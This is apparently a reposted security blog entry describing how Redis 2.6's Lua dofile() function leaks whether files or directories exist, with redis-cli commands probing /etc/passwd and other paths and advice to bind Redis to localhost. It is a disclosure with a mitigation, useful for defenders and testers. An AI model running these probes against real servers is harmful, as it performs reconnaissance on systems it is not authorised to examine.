Filesystem Enumeration using Redis and Lua
来源:互联网 发布:ps软件下载官方网 编辑:程序博客网 时间:2024/06/05 01:07
Redis 2.6 was recently released by Antirez at the end of RedisConf. One of the major features that comes with 2.6 is embedded Lua scripting.
Even though the Lua sandbox within Redis has been very locked down to only the base library and a few others, we have found at least one way to abuse Lua to get some data from outside the sandbox.
There is a function to load and execute a file called dofile()
Given the fact that Lua scripts should perform atomically, this function shouldn’t actually exist in the sandbox. We have a pending pull request to remove this function.
The errors this function gives allow an attacker to determine if a file or directory exists or not. This might be useful in locating a web root or determining the operating system. Not a significant vulnerability in and of itself, but gives information to an attacker they would not otherwise have.
When a file doesn’t exist we get a very obvious “No such file or directory error”
net read 127.0.0.1:6379 id 1: -ERR Error running script (call to f_b5e5869caf1de9ffa1ae173bf46fef3024d3f987): cannot open /dev/a:No such file or directory
Here is an example of how to do this enumeration from a shell.
$ redis-cli -h localhost -p 6379 eval "dofile('/etc/passwd')" 0
(error) ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:2: unexpected symbol near ‘#’
$ redis-cli -h localhost -p 6379 eval "dofile('/tmp')" 0
(error) ERR Error running script (call to f_70391feea8a62e239b3055c11b7d9d1d8c78db6e): cannot read /tmp:Is a directory
$ redis-cli -h localhost -p 6379 eval "dofile('/doesnotexist')" 0
(error) ERR Error running script (call to f_e84ccf03dc6b3547568096467afa7b3242ed108d): cannot open /doesnotexist: No such file or directory
Conclusion for penetration testers:
Keep an eye out for Redis servers on the network during your assessments
Conclusion for everyone else:
Keep your Redis server off the Internet by setting “bind 127.0.0.1” in the redis.conf file.
- Filesystem Enumeration using Redis and Lua
- redis lua and nodejs
- Software enumeration using Internet Explorer
- SNMP Enumeration and hacking
- File and Directory Enumeration
- Redis(7)Creating and Using Cluster Mode
- Dynamic nginx upstreams with Lua and Redis
- Using Lua and C++ interchangably on C++ objects
- Filesystem Formatting and Checking
- Improve Magento Cache and Session by Using Redis
- lua-redis
- redis lua
- redis lua
- Perl: Filesystem analysis and traversal
- Enumeration
- Enumeration
- enumeration
- Enumeration
- 多线程传参问题
- 面试题目集合
- SIP代理服务器
- Python编码问题总结
- using namespace std 说明
- Filesystem Enumeration using Redis and Lua
- Java中文乱码处理
- jQuery中常用的函数方法总结
- hdu 4485 B-Casting (数学)
- C++程序员我的学习指南
- 工薪族如何发家致富
- 一个基于jQuery写的弹窗效果(附源码)
- 冒泡排序算法原理及实现
- android的权限管理该怎么做?